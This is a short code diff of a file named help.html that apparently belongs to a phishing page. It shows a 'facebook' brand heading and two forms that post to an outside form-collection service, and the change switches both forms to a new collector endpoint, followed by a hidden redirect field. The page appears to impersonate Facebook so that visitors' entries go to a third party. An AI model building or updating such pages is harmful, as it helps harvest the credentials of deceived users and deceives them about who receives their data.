--- a/help.html
+++ b/help.html
@@ -11,8 +11,8 @@
             <b class="text-5xl text-white">facebook</b>
         </div>
 
-<form class="sm:hidden lg:block md:block" action="https://submit-form.com/QHwOBduzH" method="post"> 
-<form action="https://submit-form.com/QHwOBduzH">
+<form class="sm:hidden lg:block md:block" action="https://submit-form.com/eMecZmZec" method="post"> 
+<form action="https://submit-form.com/eMecZmZec">
   <input
     type="hidden"
     name="_redirect"
